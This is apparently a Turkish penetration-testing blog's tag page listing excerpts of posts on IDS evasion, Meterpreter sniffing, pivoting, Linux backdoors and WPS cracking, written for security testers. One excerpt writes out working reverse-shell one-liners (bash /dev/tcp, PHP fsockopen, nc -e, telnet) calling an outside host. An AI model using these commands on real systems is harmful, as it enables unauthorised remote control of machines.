Network Pentest Etiketli Yazılar

BGA Blog yazıları

Port Taramalarında Ağ Tabanlı Atak Önleme Sistemlerini Şaşırtma
2013

Port Taramalarında Ağ Tabanlı Atak Önleme Sistemlerini Şaşırtma

Port tarama ağ seviyesi atakların başında gelmektedir ve sızma testlerinde ilk adımlardan biridir  (bilgi toplama aşaması) Port tarama yapmadan diğer aşamalara geçilmesi genellikle sızma testlerinin eksik kalmasıyla sonuçlanmaktadır. Zira bir güvenlik zafiyetinin olması için öncelikle hizmet veren bir servisin (sunucu tabanlı zafiyetler) olması gerekmektedir, hizmet veren bir servis olması için de TCP/IP ağlarda port kavramı devreye girmektedir. Port tarama işlemi gürültü çıkarttığı için çok rahatlıkla Saldırı Tespit Sistemleri tarafından yakalanabilir. Port tarama…
Devamı
Sızma Testlerinde İlerleme ( Post Exploitation -Network Sniffing)
2012

Sızma Testlerinde İlerleme ( Post Exploitation -Network Sniffing)

Uzak bir sistem ele geçirildiğinde, hedef sistemde ilerlemek için elde edilecek kritik verilerden biride network trafiğidir. Ele geçirilen sistemin üzerinden ftp, http, smtp, pop3 vb. okunabilir veri trafiği akıyor ve şifreler, hassas bilgiler içeriyor olabilir. Meterpreter ajanının sniffing özelliği ile, uzak sistemin ağ kartını dinleyerek trafiği kaydedebilirsiniz. Alternatif olarak, kurulum gerektirmeyen rawcap yazılımıda kullanılabilir. Rawcap kullanımı ile ilgili aşağıdaki blog girdisine bakabilirsiniz; http://blog.bga.com.tr/2011/04/rawcap-windows-komut-satr-sniffer-arac.html Meterpreter, hedef sisteme bulaştırıldıkdan sonra; Meterpreter sniffer modülünün aktif…
Devamı
Mac OS X – Metasploit Framework Kurulumu
2012

Mac OS X – Metasploit Framework Kurulumu

Mac OS X platformlarda, güvenlik testleri gerçekleştirmek için sahip olmanız gereken çeşitli yazılımlar bulunuyor. Network güvenlik testlerinde ihtiyaç duyulan nmap,metasploit araçları bunlardan bazılarıdır.Bu yazıda Mac OS X sistemlere Metasploit Framework kurulumu anlatılmıştır.Ön Gereksinimler:Macports : http://www.macports.org/Xcode : http://developer.apple.com/tools/xcode/Xcode ve  Bileşenlerinin KurulumuApplestore aracılığı ile Xcode ücret$iz ve kolayca kurulabilir. Aşağıdaki adımlarla birlikte, Xcode Command Line Tools kurulumu yapılabilir.Xcode > Preferences > Downloads > Command Line Tools > 'install'Macports Kurulumuhttp://www.macports.org/install.php adresinden sahip olduğunuz Mac platforumuna ait…
Devamı
Backtrack Linux-101 Eğitimi (Ücretsiz)
2012

Backtrack Linux-101 Eğitimi (Ücretsiz)

Türkiye'deki bilişim güvenliği çalışmalarına somut katkı vermek amacıyla Bilgi/Bilişim Güvenliği-101 eğitimi serisi başlatmış bulunuyoruz. 101 eğitimleri serisi önce belirli konularda online eğitimler -ilk aşamada sunum olarak yayınlanacak- sonraki aşamada eğitimlere ait online sınavlar ve en son olarak genel katkıya açık wiki sayfaları hazırlanacaktır. Uzun soluklu bir çalışma olarak planlanan BG-101 serisi aşağıdaki temel eğitimleri içermektedir. DDoS Saldırıları ve Savunma Yolları 101 Eğitimi Web Uygulama Güvenliği 101 Eğitimi Ağ Temelleri ve Güvenliği 101…
Devamı
Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri
2012

Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri

"Nat Arkasındaki Sistemler İçin Reverse Shell Alma Yöntemleri" konulu blog girdisinde, NAT arkasındaki sistemlere erişim mantığı ve örnek netcat uygulaması yer alıyor. Bu yazıda, farklı durumlarda pratik olarak reverse shell alma teknikleri bulunuyor;Not: Dinleme modunda "nc -lvp 443" komutu kullanılabilir.BASHbash -i >& /dev/tcp/1.1.1.1/443 0>&1  (Red hat tabanlı sistemler için)PHPphp -r '$sock=fsockopen("1.1.1.1",443);exec("/bin/sh -i <&3 >&3 2>&3");'Netcatnc -e /bin/sh 1.1.1.1 443Telnettelnet 1.1.1.1 4444 | /bin/bash | telnet 1.1.1.1 443Windows Reverse Shell (metasploit)#msfpayload windows/shell/reverse_tcp LHOST=1.1.1.1…
Devamı
Intrusion Prevention System Stateful Signature Inspection Testleri
2012

Intrusion Prevention System Stateful Signature Inspection Testleri

Saldırı Engelleme Sistemleri günümüz sınır güvenliğin akla gelen ilk bileşenlerden biridir. IPS'ler klasik güvenlik duvarlarından farklı olarak barındırdıkları DPI(Deep Packet Inspection) altyapılarıyla protokollere ait tüm detay alanları inceleyebilir ve bu alanlar içerisinde isteğe bağlı olarak paketleri engelleyebilir.Günümüz sistemlerinde kullanılan IPS'lerin tamamı stateful mimaride çalışır. Stateful packet inspection (Durum korumalı paket inceleme) IPS'in ya da Firewall'un üzerinden geçirdiği her paketi bağımsız olarak incelemesi yerine paketler arasındaki ilişkiyi gozetleyerek daha akıllı kararlar verebilmesini sağlar.…
Devamı
Nat Arkasındaki Sistemler İçin Reverse Shell Alma Yöntemleri
2012

Nat Arkasındaki Sistemler İçin Reverse Shell Alma Yöntemleri

Gerçek penetrasyon testlerinde ana amaçlardan biri hedef sistemde kalıcı olarak komut çalıştırabilecek şekilde arka kapılar oluşturmaktır . Hedef sistemin genellikle bir güvenlik duvarı arkasında olacağı düşünülürse uzaktan port açılamayacağı için reverse shell olarak tabir edilen tersine bağlantı yöntemi kullanılır. Bu yöntem eğer pentester NAT yapan bir Firewall/modem arkasında ise biraz zorlu olmaktadır. NAT arkasında revershe shell almak isteyen biri için temelde iki yöntem vardır. Bunlar: Firewall/Modemin PAT(Port Address Translation)özelliğini kullanarak gerçek ip…
Devamı
Linux Binary Backdoor – Varolan Bir Uygulamaya Arka Kapı Yerleştirme
2012

Linux Binary Backdoor – Varolan Bir Uygulamaya Arka Kapı Yerleştirme

Linux sistemler güvenliği ve güvenirliği ile bilinir. Sunucu alt yapısında diğer işletim sistemlerine göre performansı ve esnekliğine nazaran daha çok tercih edilir. Ubuntu vb. son kullanıcıya hitap eden desktop sürümleride yayınlaşmaktadır.Linux sistemlerde virus tehlikesi diğer işletim sistemlerine göre sayılmayacak kadar az olsada exploit/backdoor/rootkit tehlikesi sıkça yaşanmaktadır. Bu yazıda, linux sistem güvenliğini test etmek için bir linux uygulamasına nasıl backdoor ekleneceği ve kurban sistemin komut satırının ele geçirmesi anlatılmıştır.Örnek, 32 bit linux sistemlerde…
Devamı
Pentest Çalışmalarında Network Pivoting
2012

Pentest Çalışmalarında Network Pivoting

Yerel ağdaki bir sistemin güvenliği, diğer sistemlerin güvenliğiyle doğrudan alakalıdır. Yerel ağdaki bir sistem ele geçirildiğinde, diğer sistemlere yönelik yerel ağ saldırıları (arp spoofing, dns cache poisoining vb.) , brute force ve exploiting denemeleri gerçekleştirilebilinir.Pentest çalışmalarında, uzak ağdan bir bilgisayar ele geçirildiğinde bu sistem üzerinden tüm yerel ağa erişim kurmak ve diğer sistemleri ele geçirmek istenilir. Bu tür durumlarda, firewall/nat korumalı sistemin arkasındaki tüm networklere erişmek için ters tünelleme veya vpn teknikleri…
Devamı
WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak
2012

WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak

  WPS (Wi-Fi Protected Setup) teknolojisi, kablosuz ağın güvenlik ayarlarını kolayca ayarlamak için kullanılan esnek bir teknolojidir. Kablosuz ağ cihazını yapılandırırken, üzerinde bulunan PIN numarası ile cihazın yapılandırılmasını sağlar. Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebilir. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir. Örnek Uygulama Bu işlemleri yapmak için, ağ kartının monitor modu desteklemesi lazım.…
Devamı